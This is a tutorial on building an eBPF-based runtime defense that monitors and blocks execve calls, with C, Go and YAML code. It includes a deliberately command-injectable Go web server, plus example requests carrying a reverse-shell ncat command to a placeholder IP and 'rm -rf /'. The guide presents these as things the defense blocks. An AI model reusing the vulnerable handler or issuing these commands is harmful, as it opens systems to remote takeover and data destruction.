eBPF-Based ADR: Real-time Application Defense#

Modern web applications are complex ecosystems that interact with users on multiple levels, with each level potentially becoming an entry point for sophisticated attacks. Traditional perimeter security measures like WAF, firewalls, and IDS/IPS systems, while essential, often fall short of protecting against advanced threats that exploit application-level vulnerabilities.

This comprehensive guide demonstrates how to build a real-time Application Detection and Response (ADR) system using eBPF technology, providing unprecedented visibility and control over application behavior at the kernel level.

Introduction#

Introduction to ADR#

Application Detection & Response (ADR) represents a paradigm shift in application security, moving beyond traditional perimeter-based defenses to provide runtime protection directly within applications. Unlike conventional security tools that monitor network traffic or infrastructure, ADR operates at the application level, analyzing behavior in real time to detect and prevent attacks as they occur.

1
graph TB
2
    subgraph "Traditional Security vs ADR"
3
        subgraph "Traditional Approach"
4
            WAF["Web Application Firewall"]
5
            FW["Network Firewall"]
6
            IDS["IDS/IPS"]
7
            WAF --> |"Network Level"| APP1["Application"]
8
            FW --> |"Perimeter"| APP1
9
            IDS --> |"Signature Based"| APP1
10
        end
11

12
        subgraph "ADR Approach"
13
            ADR["ADR System"]
14
            ADR --> |"Runtime Analysis"| APP2["Application"]
15
            ADR --> |"Behavioral Detection"| APP2
16
            ADR --> |"Real-time Response"| APP2
17
        end
18
    end
19

20
    subgraph "Attack Vectors"
21
        SQLi["SQL Injection"]
22
        RCE["Remote Code Execution"]
23
        SSTI["Server-Side Template Injection"]
24
        SSRF["Server-Side Request Forgery"]
25
    end
26

27
    style WAF fill:#ffcdd2
28
    style FW fill:#ffcdd2
29
    style IDS fill:#ffcdd2
30
    style ADR fill:#c8e6c9

Limitations of Traditional Security:

Network-Level Focus: WAFs analyze HTTP traffic but lack application context
High False Positives: Without application logic understanding, many legitimate requests are flagged
Evasion Vulnerability: Attackers can bypass protection using encoding, obfuscation, or protocol manipulation
Limited Visibility: No insight into what happens inside the application after a request passes through

ADR Advantages:

Deep Analysis: Monitors internal application behavior, not just network traffic
Context Awareness: Understands application logic and legitimate vs. malicious behavior
Evasion Resistance: Detects threats that bypass traditional WAF mechanisms
Automated Response: Can automatically block malicious requests and alert administrators
Zero-Day Protection: Behavioral analysis helps detect unknown attack patterns

Introduction to eBPF#

eBPF (Extended Berkeley Packet Filter) serves as the technological foundation for our ADR system, providing the capability to run custom programs directly in the Linux kernel space with unprecedented safety and performance.

1
graph TD
2
    subgraph "eBPF for Security Monitoring"
3
        UserApp["User Application"]
4
        eBPFProg["eBPF Programs"]
5
        Kernel["Linux Kernel"]
6

7
        subgraph "Security Hook Points"
8
            SysCall["System Call Tracing"]
9
            LSM["Linux Security Modules"]
10
            NetFilter["Network Filtering"]
11
            FileSystem["File System Events"]
12
        end
13

14
        subgraph "Data Collection"
15
            RingBuf["Ring Buffer"]
16
            Maps["eBPF Maps"]
17
            Stats["Statistics"]
18
        end
19

20
        UserApp --> eBPFProg
21
        eBPFProg --> SysCall
22
        eBPFProg --> LSM
23
        eBPFProg --> NetFilter
24
        eBPFProg --> FileSystem
25

26
        SysCall --> RingBuf
27
        LSM --> Maps
28
        NetFilter --> Stats
29
        FileSystem --> RingBuf
30

31
        RingBuf --> UserApp
32
        Maps --> UserApp
33
        Stats --> UserApp
34
    end
35

36
    style eBPFProg fill:#e8f5e8
37
    style RingBuf fill:#e1f5fe
38
    style UserApp fill:#fff3e0

Why eBPF for ADR:

Real-time Monitoring: Intercepts system calls and security events as they happen
Minimal Overhead: Runs directly in kernel space with JIT compilation
Safe Execution: Comprehensive verification prevents system crashes
Flexible Filtering: Can be programmed to detect specific attack patterns
Integration Ready: Works with existing applications without code changes

Example in Action#

Idea and Demonstration of Functionality#

Let’s examine a practical ADR implementation that demonstrates how eBPF can protect applications from Remote Code Execution (RCE) attacks. Our system uses a configuration-driven approach to define security policies and responds to threats in real time.

Configuration File#

The ADR system uses a YAML configuration file to define monitoring and blocking rules:

1
targets:
2
  - type: "command"
3
    value: "/usr/bin/whoami"
4
    actions:
5
      block: false
6
      monitor: true
7
  - type: "pid"
8
    value: 309413
9
    actions:
10
      monitor: true
11
      block: true
12
  - type: "uid"
13
    value: 1000
14
    actions:
15
      monitor: false
16
      block: false

Configuration Structure Explanation:

targets: List of monitoring/blocking targets
type: Target classification
- command: Specific executable paths
- pid: Process ID targeting
- uid: User ID targeting
value: The specific value for the target type
actions: Available responses
- monitor: Log execution events
- block: Prevent execution

Key Features:

Real-time Updates: Configuration changes apply immediately without restart
Priority-based Rules: Command → PID → UID evaluation order
Flexible Actions: Mix monitoring and blocking as needed

Priority of Rule Application#

The system evaluates rules in a specific priority order to ensure consistent behavior:

1
graph TD
2
    Request["Incoming Request/System Call"]
3
    Command{{"Check Command Rule"}}
4
    PID{{"Check PID Rule"}}
5
    UID{{"Check UID Rule"}}
6
    Allow["Allow Execution"]
7
    Block["Block Execution"]
8
    Monitor["Monitor & Log"]
9

10
    Request --> Command
11
    Command --> |"Match Found"| Action1["Apply Command Action"]
12
    Command --> |"No Match"| PID
13
    PID --> |"Match Found"| Action2["Apply PID Action"]
14
    PID --> |"No Match"| UID
15
    UID --> |"Match Found"| Action3["Apply UID Action"]
16
    UID --> |"No Match"| Allow
17

18
    Action1 --> Allow
19
    Action1 --> Block
20
    Action1 --> Monitor
21
    Action2 --> Allow
22
    Action2 --> Block
23
    Action2 --> Monitor
24
    Action3 --> Allow
25
    Action3 --> Block
26
    Action3 --> Monitor
27

28
    style Command fill:#e1f5fe
29
    style PID fill:#fff3e0
30
    style UID fill:#f3e5f5
31
    style Block fill:#ffcdd2
32
    style Allow fill:#c8e6c9

Command Priority: Highest priority, checked first
PID Priority: Process-specific rules
UID Priority: User-based rules as fallback

Example Vulnerable Application#

Consider a simple web server with an RCE vulnerability:

1
// Vulnerable web server example
2
package main
3

4
import (
5
    "fmt"
6
    "net/http"
7
    "os/exec"
8
    "log"
9
)
10

11
func handler(w http.ResponseWriter, r *http.Request) {
12
    cmd := r.URL.Query().Get("cmd")
13
    if cmd == "" {
14
        fmt.Fprintf(w, "Usage: /?cmd=command")
15
        return
16
    }
17

18
    // VULNERABLE: Direct command execution without validation
19
    output, err := exec.Command("sh", "-c", cmd).Output()
20
    if err != nil {
21
        fmt.Fprintf(w, "Error: %v", err)
22
        return
23
    }
24

25
    fmt.Fprintf(w, "Output: %s", output)
26
}
27

28
func main() {
29
    http.HandleFunc("/", handler)
30
    log.Println("Server starting on :8080")
31
    http.ListenAndServe(":8080", nil)
32
}

Attack Scenarios:

http://localhost:8080/?cmd=whoami - Information gathering
http://localhost:8080/?cmd=ncat 10.10.10.10 9001 -e sh - Reverse shell
http://localhost:8080/?cmd=rm -rf / - System destruction

Before Enabling ADR#

1
sequenceDiagram
2
    participant Attacker
3
    participant WebServer
4
    participant System
5

6
    Attacker->>WebServer: GET /?cmd=ncat 10.10.10.10 9001 -e sh
7
    WebServer->>System: exec("sh", "-c", "ncat 10.10.10.10 9001 -e sh")
8
    System->>System: Execute malicious command
9
    System-->>Attacker: Reverse shell connection established
10

11
    Note over System: System Compromised!

Without ADR Protection:

Attacker sends malicious command
Server executes command without restriction
System becomes compromised
No detection or prevention mechanisms

After Enabling ADR#

1
sequenceDiagram
2
    participant Attacker
3
    participant WebServer
4
    participant ADR
5
    participant System
6

7
    Attacker->>WebServer: GET /?cmd=ncat 10.10.10.10 9001 -e sh
8
    WebServer->>System: exec("sh", "-c", "ncat 10.10.10.10 9001 -e sh")
9
    System->>ADR: eBPF intercepts execve syscall
10
    ADR->>ADR: Check command "ncat" against rules
11
    ADR->>ADR: Check PID against rules
12
    ADR->>ADR: Command not in whitelist, PID has block:true
13
    ADR-->>System: BLOCK execution (-EPERM)
14
    System-->>WebServer: Permission denied
15
    WebServer-->>Attacker: Error: permission denied
16
    ADR->>ADR: Log security event
17

18
    Note over ADR: Attack Blocked & Logged!

With ADR Protection:

Malicious command intercepted at syscall level
ADR evaluates command against security rules
Unauthorized command blocked before execution
Security event logged for analysis
System remains protected

Implementation of the eBPF Program#

Our eBPF program operates at two critical points: monitoring system calls for detection and intercepting them for prevention. Let’s examine the complete implementation.

Core Data Structures and Constants#

1
#include <linux/bpf.h>
2
#include <bpf/bpf_helpers.h>
3
#include <bpf/bpf_core_read.h>
4

5
// Configuration constants
6
#define MAX_CMD_LEN 32
7
#define ARG_SIZE 64
8
#define MAX_ARGS 6
9
#define FULL_MAX_ARGS_ARR (MAX_ARGS * ARG_SIZE)
10
#define LAST_ARG (FULL_MAX_ARGS_ARR - ARG_SIZE)
11

12
// System call structure for execve
13
struct trace_event_raw_sys_enter {
14
    char unused1[16];                    // Padding for alignment
15
    long unsigned int args[MAX_ARGS];   // System call arguments
16
};
17

18
// Task structure for process information
19
typedef struct {
20
    unsigned int val;
21
} kuid_t;
22

23
struct task_struct {
24
    struct task_struct *real_parent;
25
    __u32 tgid;
26
};
27

28
// Event structure for user space communication
29
struct event {
30
    __u32 uid;                          // User ID
31
    __u32 pid;                          // Process ID
32
    __u32 ppid;                         // Parent Process ID
33
    __u32 args_count;                   // Number of arguments
34
    __u32 args_size;                    // Total size of arguments
35
    char command[MAX_CMD_LEN];          // Command name
36
    char args[FULL_MAX_ARGS_ARR];       // Command arguments
37
};

Design Considerations:

Memory Efficiency: Fixed-size structures for predictable memory usage
Safety: Padding ensures proper alignment for kernel compatibility
Extensibility: Modular design allows easy feature additions

eBPF Maps for Data Storage and Communication#

1
// Ring buffer for real-time event streaming
2
struct {
3
    __uint(type, BPF_MAP_TYPE_RINGBUF);
4
    __uint(max_entries, 1 << 24);       // 16 MB buffer
5
} events SEC(".maps");
6

7
// Target key structure for rule matching
8
struct TargetKey {
9
    __u8 type;                          // 'c'=command, 'u'=UID, 'p'=PID
10
    __u8 reserved[3];                   // Alignment padding
11
    union {
12
        char command[MAX_CMD_LEN];      // Command path
13
        __u32 id;                       // UID or PID
14
    };
15
};
16

17
// Target value with bit-encoded actions
18
typedef __u8 TargetValue;
19
// Bit layout: [7|6|5|4|3|2|M|B]
20
// M = Monitor bit, B = Block bit
21
// 00 = No action, 01 = Block only, 10 = Monitor only, 11 = Monitor and Block
22

23
// Hash map for security rules
24
struct {
25
    __uint(type, BPF_MAP_TYPE_HASH);
26
    __type(key, struct TargetKey);
27
    __type(value, TargetValue);
28
    __uint(max_entries, 1024);
29
} targets SEC(".maps");
30

31
// Helper functions for bit manipulation
32
static __always_inline int is_monitored(TargetValue val) {
33
    return (val & 0b10) >> 1;          // Check monitor bit
34
}
35

36
static __always_inline int is_blocked(TargetValue val) {
37
    return val & 0b01;                 // Check block bit
38
}

Map Design Benefits:

Ring Buffer: High-performance, low-latency event streaming
Hash Map: O(1) lookup time for rule evaluation
Bit Encoding: Memory-efficient action storage
Union Types: Flexible key structure for different target types

Rule Evaluation Logic#

1
// Check if action should be applied based on priority order
2
static __always_inline int check_action(__u32 ppid, __u32 uid, char *command,
3
                                       int (*action_check)(TargetValue),
4
                                       __u8 *action_type) {
5
    struct TargetKey key = {};
6
    TargetValue *value;
7

8
    // Priority 1: Check command-based rule
9
    key.type = 'c';
10
    bpf_probe_read_kernel_str(&key.command, sizeof(key.command), command);
11
    value = bpf_map_lookup_elem(&targets, &key);
12
    if (value && action_check(*value)) {
13
        *action_type = 'c';
14
        return 1;
15
    }
16

17
    // Priority 2: Check PID-based rule
18
    key.type = 'p';
19
    key.id = ppid;
20
    value = bpf_map_lookup_elem(&targets, &key);
21
    if (value && action_check(*value)) {
22
        *action_type = 'p';
23
        return 1;
24
    }
25

26
    // Priority 3: Check UID-based rule
27
    key.type = 'u';
28
    key.id = uid;
29
    value = bpf_map_lookup_elem(&targets, &key);
30
    if (value && action_check(*value)) {
31
        *action_type = 'u';
32
        return 1;
33
    }
34

35
    return 0;  // No matching rule found
36
}

Rule Evaluation Features:

Priority-based: Command → PID → UID evaluation order
Flexible Actions: Separate functions for monitoring vs. blocking
Type Tracking: Records which rule type matched for debugging
Fail-safe: Defaults to allow if no rules match

System Call Monitoring Implementation#

1
SEC("tracepoint/syscalls/sys_enter_execve")
2
int monitor_syscalls(struct trace_event_raw_sys_enter *ctx) {
3
    // Process identification
4
    __u32 pid = bpf_get_current_pid_tgid() >> 32;
5
    struct task_struct *task = (struct task_struct *)bpf_get_current_task();
6
    __u32 ppid = BPF_CORE_READ(task, real_parent, tgid);
7
    __u32 uid = bpf_get_current_uid_gid();
8

9
    // Initialize event structure
10
    struct event evt = {0};
11
    evt.pid = pid;
12
    evt.uid = uid;
13
    evt.ppid = ppid;
14

15
    // Extract command path
16
    char *path_ptr = (char *)BPF_CORE_READ(ctx, args[0]);
17
    if (bpf_probe_read_str(&evt.command, sizeof(evt.command), path_ptr) < 0) {
18
        return 0;
19
    }
20

21
    // Check if monitoring is required
22
    __u8 action_type;
23
    int result = check_action(ppid, uid, evt.command, is_monitored, &action_type);
24
    if (result == 0) {
25
        return 0;  // No monitoring required
26
    }
27

28
    // Extract command arguments
29
    const char **args = (const char **)(ctx->args[1]);
30
    const char *argp;
31
    int ret;
32

33
    // Process first argument (command path)
34
    ret = bpf_probe_read_user_str(evt.args, ARG_SIZE, (const char *)ctx->args[0]);
35
    if (ret < 0) return 0;
36

37
    if (ret <= ARG_SIZE) {
38
        evt.args_size += ret;
39
    } else {
40
        evt.args[0] = '\0';
41
        evt.args_size++;
42
    }
43
    evt.args_count++;
44

45
    // Process additional arguments
46
    #pragma unroll
47
    for (__u32 i = 1; i < MAX_ARGS; i++) {
48
        ret = bpf_probe_read_user(&argp, sizeof(argp), &args[i]);
49
        if (ret < 0) break;
50

51
        if (evt.args_size > LAST_ARG) break;
52

53
        ret = bpf_probe_read_user_str(&evt.args[evt.args_size], ARG_SIZE, argp);
54
        if (ret < 0) break;
55

56
        evt.args_count++;
57
        evt.args_size += ret;
58
    }
59

60
    // Send event to user space
61
    void *ringbuf_data = bpf_ringbuf_reserve(&events, sizeof(evt), 0);
62
    if (!ringbuf_data) return 0;
63

64
    __builtin_memcpy(ringbuf_data, &evt, sizeof(evt));
65
    bpf_ringbuf_submit(ringbuf_data, 0);
66

67
    return 0;
68
}

Security Enforcement Implementation#

1
// Linux security module structures
2
struct linux_binprm {
3
    char unused1[72];
4
    struct cred *cred;
5
    char unused2[24];
6
    const char *filename;
7
    char unused3[312];
8
};
9

10
struct cred {
11
    char unused1[8];
12
    kuid_t uid;
13
};
14

15
// LSM hook for blocking execution
16
SEC("lsm/bprm_check_security")
17
int BPF_PROG(enforce_execve, struct linux_binprm *bprm, int ret) {
18
    if (ret != 0) return ret;  // Already blocked by another LSM
19

20
    // Extract process information
21
    __u32 cred_uid = -1;
22
    char current_comm[MAX_CMD_LEN] = {0};
23
    bpf_probe_read_kernel(&cred_uid, sizeof(cred_uid), &bprm->cred->uid.val);
24
    bpf_probe_read_kernel_str(&current_comm, sizeof(current_comm), bprm->filename);
25

26
    struct task_struct *task = (struct task_struct *)bpf_get_current_task();
27
    __u32 ppid = BPF_CORE_READ(task, real_parent, tgid);
28

29
    // Check if execution should be blocked
30
    __u8 action_type;
31
    int result = check_action(ppid, cred_uid, current_comm, is_blocked, &action_type);
32
    if (result) {
33
        return -1;  // Block execution with EPERM
34
    }
35

36
    return ret;  // Allow execution
37
}
38

39
char LICENSE[] SEC("license") = "GPL";

Security Features:

Early Interception: Blocks execution before process creation
Credential Validation: Verifies user permissions
Return Code Handling: Respects existing security decisions
Minimal Impact: Only blocks when necessary

Complete eBPF Program Code#

Click to view the complete eBPF program

1
//go:build ignore
2

3
#include <linux/bpf.h>
4
#include <bpf/bpf_helpers.h>
5
#include <bpf/bpf_core_read.h>
6

7
#define MAX_CMD_LEN 32
8
#define ARG_SIZE 64
9
#define MAX_ARGS 6
10
#define FULL_MAX_ARGS_ARR (MAX_ARGS * ARG_SIZE)
11
#define LAST_ARG (FULL_MAX_ARGS_ARR - ARG_SIZE)
12

13
struct trace_event_raw_sys_enter {
14
    char unused1[16];
15
    long unsigned int args[MAX_ARGS];
16
};
17

18
typedef struct {
19
    unsigned int val;
20
} kuid_t;
21

22
struct task_struct {
23
    struct task_struct *real_parent;
24
    __u32 tgid;
25
};
26

27
struct event {
28
    __u32 uid;
29
    __u32 pid;
30
    __u32 ppid;
31
    __u32 args_count;
32
    __u32 args_size;
33
    char command[MAX_CMD_LEN];
34
    char args[FULL_MAX_ARGS_ARR];
35
};
36

37
struct {
38
    __uint(type, BPF_MAP_TYPE_RINGBUF);
39
    __uint(max_entries, 1 << 24);
40
} events SEC(".maps");
41

42
struct TargetKey {
43
    __u8 type;
44
    __u8 reserved[3];
45
    union {
46
        char command[MAX_CMD_LEN];
47
        __u32 id;
48
    };
49
};
50

51
typedef __u8 TargetValue;
52

53
struct {
54
    __uint(type, BPF_MAP_TYPE_HASH);
55
    __type(key, struct TargetKey);
56
    __type(value, TargetValue);
57
    __uint(max_entries, 1024);
58
} targets SEC(".maps");
59

60
static __always_inline int is_monitored(TargetValue val) {
61
    return (val & 0b10) >> 1;
62
}
63

64
static __always_inline int is_blocked(TargetValue val) {
65
    return val & 0b01;
66
}
67

68
static __always_inline int check_action(__u32 ppid, __u32 uid, char *command,
69
                                       int (*action_check)(TargetValue),
70
                                       __u8 *action_type) {
71
    struct TargetKey key = {};
72
    TargetValue *value;
73

74
    key.type = 'c';
75
    bpf_probe_read_kernel_str(&key.command, sizeof(key.command), command);
76
    value = bpf_map_lookup_elem(&targets, &key);
77
    if (value && action_check(*value)) {
78
        *action_type = 'c';
79
        return 1;
80
    }
81

82
    key.type = 'p';
83
    key.id = ppid;
84
    value = bpf_map_lookup_elem(&targets, &key);
85
    if (value && action_check(*value)) {
86
        *action_type = 'p';
87
        return 1;
88
    }
89

90
    key.type = 'u';
91
    key.id = uid;
92
    value = bpf_map_lookup_elem(&targets, &key);
93
    if (value && action_check(*value)) {
94
        *action_type = 'u';
95
        return 1;
96
    }
97

98
    return 0;
99
}
100

101
SEC("tracepoint/syscalls/sys_enter_execve")
102
int monitor_syscalls(struct trace_event_raw_sys_enter *ctx) {
103
    int ret;
104
    __u32 pid = bpf_get_current_pid_tgid() >> 32;
105
    struct task_struct *task = (struct task_struct *)bpf_get_current_task();
106
    __u32 ppid = BPF_CORE_READ(task, real_parent, tgid);
107
    struct event evt = {0};
108
    __u32 uid = bpf_get_current_uid_gid();
109

110
    char *path_ptr = (char *)BPF_CORE_READ(ctx, args[0]);
111
    if (bpf_probe_read_str(&evt.command, sizeof(evt.command), path_ptr) < 0)
112
        return 0;
113

114
    __u8 action_type;
115
    int result = check_action(ppid, uid, evt.command, is_monitored, &action_type);
116
    if (result == 0)
117
        return 0;
118

119
    evt.pid = pid;
120
    evt.uid = uid;
121
    evt.ppid = ppid;
122
    evt.args_count = 0;
123
    evt.args_size = 0;
124

125
    const char **args = (const char **)(ctx->args[1]);
126
    const char *argp;
127

128
    ret = bpf_probe_read_user_str(evt.args, ARG_SIZE, (const char *)ctx->args[0]);
129
    if (ret < 0)
130
        return 0;
131
    if (ret <= ARG_SIZE) {
132
        evt.args_size += ret;
133
    } else {
134
        evt.args[0] = '\0';
135
        evt.args_size++;
136
    }
137

138
    evt.args_count++;
139

140
    #pragma unroll
141
    for (__u32 i = 1; i < MAX_ARGS; i++) {
142
        ret = bpf_probe_read_user(&argp, sizeof(argp), &args[i]);
143
        if (ret < 0)
144
            break;
145

146
        if (evt.args_size > LAST_ARG)
147
            break;
148

149
        ret = bpf_probe_read_user_str(&evt.args[evt.args_size], ARG_SIZE, argp);
150
        if (ret < 0)
151
            break;
152

153
        evt.args_count++;
154
        evt.args_size += ret;
155
    }
156

157
    ret = bpf_probe_read_user(&argp, sizeof(argp), &args[MAX_ARGS]);
158
    if (ret < 0)
159
        return 0;
160

161
    evt.args_count++;
162

163
    void *ringbuf_data = bpf_ringbuf_reserve(&events, sizeof(evt), 0);
164
    if (!ringbuf_data)
165
        return 0;
166

167
    __builtin_memcpy(ringbuf_data, &evt, sizeof(evt));
168
    bpf_ringbuf_submit(ringbuf_data, 0);
169

170
    return 0;
171
}
172

173
struct linux_binprm {
174
    char unused1[72];
175
    struct cred *cred;
176
    char unused2[24];
177
    const char *filename;
178
    char unused3[312];
179
};
180

181
struct cred {
182
    char unused1[8];
183
    kuid_t uid;
184
};
185

186
SEC("lsm/bprm_check_security")
187
int BPF_PROG(enforce_execve, struct linux_binprm *bprm, int ret) {
188
    if (ret != 0)
189
        return ret;
190

191
    __u32 cred_uid = -1;
192
    char current_comm[MAX_CMD_LEN] = {0};
193
    bpf_probe_read_kernel(&cred_uid, sizeof(cred_uid), &bprm->cred->uid.val);
194
    bpf_probe_read_kernel_str(&current_comm, sizeof(current_comm), bprm->filename);
195
    struct task_struct *task = (struct task_struct *)bpf_get_current_task();
196
    __u32 ppid = BPF_CORE_READ(task, real_parent, tgid);
197

198
    __u8 action_type;
199
    int result = check_action(ppid, cred_uid, current_comm, is_blocked, &action_type);
200
    if (result)
201
        return -1;
202

203
    return ret;
204
}
205

206
char LICENSE[] SEC("license") = "GPL";

Program Implementation in Go#

The user-space Go program manages the eBPF programs, handles configuration, and processes security events. It provides real-time monitoring and dynamic rule updates.

Core Data Structures and Configuration#

1
//go:generate go run github.com/cilium/ebpf/cmd/bpf2go -cc clang -cflags $BPF_CFLAGS Adr adr.c
2

3
package main
4

5
import (
6
    "encoding/binary"
7
    "errors"
8
    "fmt"
9
    "log"
10
    "os"
11
    "os/signal"
12
    "strings"
13
    "syscall"
14
    "time"
15
    "unsafe"
16

17
    "github.com/cilium/ebpf"
18
    "github.com/cilium/ebpf/link"
19
    "github.com/cilium/ebpf/ringbuf"
20
    "github.com/cilium/ebpf/rlimit"
21
    "github.com/fsnotify/fsnotify"
22
    "gopkg.in/yaml.v2"
23
)
24

25
// Configuration structures
26
type Config struct {
27
    Targets []Target `yaml:"targets"`
28
}
29

30
type Target struct {
31
    Type    string  `yaml:"type"`
32
    Value   interface{} `yaml:"value"`
33
    Actions Actions `yaml:"actions"`
34
}
35

36
type Actions struct {
37
    Monitor bool `yaml:"monitor"`
38
    Block   bool `yaml:"block"`
39
}
40

41
// Event structure matching eBPF program
42
type Event struct {
43
    UID       uint32
44
    PID       uint32
45
    PPID      uint32
46
    ArgsCount uint32
47
    ArgsSize  uint32
48
    Command   [32]byte
49
    Args      [384]byte
50
}
51

52
// eBPF map key structure
53
type TargetKey struct {
54
    Type     uint8
55
    Reserved [3]uint8
56
    Data     [32]byte
57
}

eBPF Program Management#

1
func main() {
2
    configFile := "config.yaml"
3
    if len(os.Args) > 1 {
4
        configFile = os.Args[1]
5
    }
6

7
    // Load initial configuration
8
    var config Config
9
    if err := loadConfig(configFile, &config); err != nil {
10
        log.Fatalf("Error loading config: %v", err)
11
    }
12

13
    // Remove memory limits for eBPF
14
    if err := rlimit.RemoveMemlock(); err != nil {
15
        log.Fatalf("Failed to remove memlock: %v", err)
16
    }
17

18
    // Load eBPF objects
19
    var objs adrObjects
20
    if err := loadAdrObjects(&objs, nil); err != nil {
21
        log.Fatalf("Error loading eBPF objects: %v", err)
22
    }
23
    defer objs.Close()
24

25
    // Populate initial rules
26
    currentTargets := populateMap(objs.Targets, config, nil)
27

28
    // Start configuration file watcher
29
    go watchConfig(configFile, objs.Targets, currentTargets)
30

31
    // Attach eBPF programs
32
    if err := attachPrograms(objs); err != nil {
33
        log.Fatalf("Failed to attach eBPF programs: %v", err)
34
    }
35

36
    // Start event processing
37
    if err := processEvents(objs.Events); err != nil {
38
        log.Fatalf("Error processing events: %v", err)
39
    }
40
}
41

42
func attachPrograms(objs adrObjects) error {
43
    // Attach monitoring program
44
    monProg := objs.MonitorSyscalls
45
    monLnk, err := link.Tracepoint("syscalls", "sys_enter_execve", monProg, nil)
46
    if err != nil {
47
        return fmt.Errorf("failed to attach monitor program: %v", err)
48
    }
49
    defer monLnk.Close()
50

51
    // Attach enforcement program
52
    lsmProg := objs.EnforceExecve
53
    lsmLnk, err := link.AttachLSM(link.LSMOptions{
54
        Program: lsmProg,
55
    })
56
    if err != nil {
57
        return fmt.Errorf("failed to attach LSM program: %v", err)
58
    }
59
    defer lsmLnk.Close()
60

61
    log.Println("eBPF programs attached successfully.")
62

63
    // Keep programs running
64
    sig := make(chan os.Signal, 1)
65
    signal.Notify(sig, syscall.SIGINT, syscall.SIGTERM)
66
    <-sig
67

68
    return nil
69
}

Configuration Management and Real-time Updates#

1
func loadConfig(filename string, config *Config) error {
2
    data, err := os.ReadFile(filename)
3
    if err != nil {
4
        return err
5
    }
6
    return yaml.Unmarshal(data, config)
7
}
8

9
func populateMap(targetsMap *ebpf.Map, config Config, currentTargets map[TargetKey]uint8) map[TargetKey]uint8 {
10
    newTargets := make(map[TargetKey]uint8)
11

12
    for _, target := range config.Targets {
13
        key := TargetKey{}
14
        var value uint8
15

16
        // Set action bits
17
        if target.Actions.Monitor {
18
            value |= 0b10  // Set monitor bit
19
        }
20
        if target.Actions.Block {
21
            value |= 0b01  // Set block bit
22
        }
23

24
        switch target.Type {
25
        case "command":
26
            key.Type = 'c'
27
            if cmdStr, ok := target.Value.(string); ok {
28
                copy(key.Data[:], cmdStr)
29
                newTargets[key] = value
30
            }
31

32
        case "pid":
33
            key.Type = 'p'
34
            var pidValue uint32
35
            switch v := target.Value.(type) {
36
            case int:
37
                pidValue = uint32(v)
38
            case uint32:
39
                pidValue = v
40
            case float64:
41
                pidValue = uint32(v)
42
            }
43
            binary.LittleEndian.PutUint32(key.Data[:4], pidValue)
44
            newTargets[key] = value
45

46
        case "uid":
47
            key.Type = 'u'
48
            var uidValue uint32
49
            switch v := target.Value.(type) {
50
            case int:
51
                uidValue = uint32(v)
52
            case uint32:
53
                uidValue = v
54
            case float64:
55
                uidValue = uint32(v)
56
            }
57
            binary.LittleEndian.PutUint32(key.Data[:4], uidValue)
58
            newTargets[key] = value
59
        }
60
    }
61

62
    // Update eBPF map
63
    updateEBPFMap(targetsMap, currentTargets, newTargets)
64

65
    log.Printf("Loaded %d targets from configuration", len(newTargets))
66
    return newTargets
67
}
68

69
func updateEBPFMap(targetsMap *ebpf.Map, oldTargets, newTargets map[TargetKey]uint8) {
70
    // Remove old entries
71
    for key := range oldTargets {
72
        if _, exists := newTargets[key]; !exists {
73
            targetsMap.Delete(unsafe.Pointer(&key))
74
        }
75
    }
76

77
    // Add/update new entries
78
    for key, value := range newTargets {
79
        err := targetsMap.Update(unsafe.Pointer(&key), unsafe.Pointer(&value), ebpf.UpdateAny)
80
        if err != nil {
81
            log.Printf("Error updating map: %v", err)
82
        }
83
    }
84
}
85

86
func watchConfig(configFile string, targetsMap *ebpf.Map, currentTargets map[TargetKey]uint8) {
87
    watcher, err := fsnotify.NewWatcher()
88
    if err != nil {
89
        log.Fatalf("Failed to create file watcher: %v", err)
90
    }
91
    defer watcher.Close()
92

93
    if err := watcher.Add(configFile); err != nil {
94
        log.Fatalf("Failed to watch config file: %v", err)
95
    }
96

97
    for {
98
        select {
99
        case event, ok := <-watcher.Events:
100
            if !ok {
101
                return
102
            }
103
            if event.Op.Has(fsnotify.Write) {
104
                log.Println("Config file changed, reloading...")
105

106
                time.Sleep(1 * time.Second)  // Allow file write to complete
107
                var config Config
108
                if err := loadConfig(event.Name, &config); err != nil {
109
                    log.Printf("Error reloading config: %v", err)
110
                    continue
111
                }
112

113
                newTargets := populateMap(targetsMap, config, currentTargets)
114
                // Update current targets reference
115
                for k := range currentTargets {
116
                    delete(currentTargets, k)
117
                }
118
                for k, v := range newTargets {
119
                    currentTargets[k] = v
120
                }
121
            }
122
        case err := <-watcher.Errors:
123
            log.Printf("File watcher error: %v", err)
124
        }
125
    }
126
}

Event Processing and Security Logging#

1
func processEvents(eventsMap *ebpf.Map) error {
2
    rd, err := ringbuf.NewReader(eventsMap)
3
    if err != nil {
4
        return fmt.Errorf("failed to create ring buffer reader: %v", err)
5
    }
6
    defer rd.Close()
7

8
    sig := make(chan os.Signal, 1)
9
    signal.Notify(sig, syscall.SIGINT, syscall.SIGTERM)
10

11
    done := make(chan bool)
12
    go func() {
13
        log.Println("Listening for security events...")
14
        for {
15
            record, err := rd.Read()
16
            if err != nil {
17
                if errors.Is(err, ringbuf.ErrFlushed) {
18
                    done <- true
19
                    break
20
                }
21
                log.Printf("Error reading from ring buffer: %v", err)
22
                continue
23
            }
24

25
            var event Event
26
            if err := event.UnmarshalBinary(record.RawSample); err != nil {
27
                log.Printf("Error unmarshaling event: %v", err)
28
                continue
29
            }
30

31
            logSecurityEvent(&event)
32
        }
33
    }()
34

35
    select {
36
    case <-sig:
37
        log.Println("Received exit signal, shutting down...")
38
    case <-done:
39
        log.Println("Event processing completed")
40
    }
41

42
    return nil
43
}
44

45
func logSecurityEvent(event *Event) {
46
    timestamp := time.Now().Format("2006-01-02 15:04:05")
47
    command := strings.TrimRight(string(event.Command[:]), "\x00")
48
    args := parseArgs(event)
49

50
    log.Printf("[SECURITY EVENT] %s - UID=%d PID=%d PPID=%d Command=%s Args=%s",
51
        timestamp, event.UID, event.PID, event.PPID, command, args)
52

53
    // Additional security analysis could be added here:
54
    // - Send alerts to SIEM systems
55
    // - Update threat intelligence feeds
56
    // - Trigger automated response workflows
57
    // - Generate forensic evidence
58
}
59

60
func parseArgs(event *Event) string {
61
    if event.ArgsSize == 0 {
62
        return ""
63
    }
64

65
    args := make([]string, 0, event.ArgsCount)
66
    data := event.Args[:event.ArgsSize]
67

68
    start := 0
69
    for i := 0; i < int(event.ArgsCount) && start < len(data); i++ {
70
        end := start
71
        for end < len(data) && data[end] != 0 {
72
            end++
73
        }
74

75
        if end > start {
76
            args = append(args, string(data[start:end]))
77
        }
78

79
        start = end + 1
80
    }
81

82
    return strings.Join(args, " ")
83
}
84

85
// Binary unmarshaling for events
86
func (e *Event) UnmarshalBinary(data []byte) error {
87
    if len(data) < int(unsafe.Sizeof(*e)) {
88
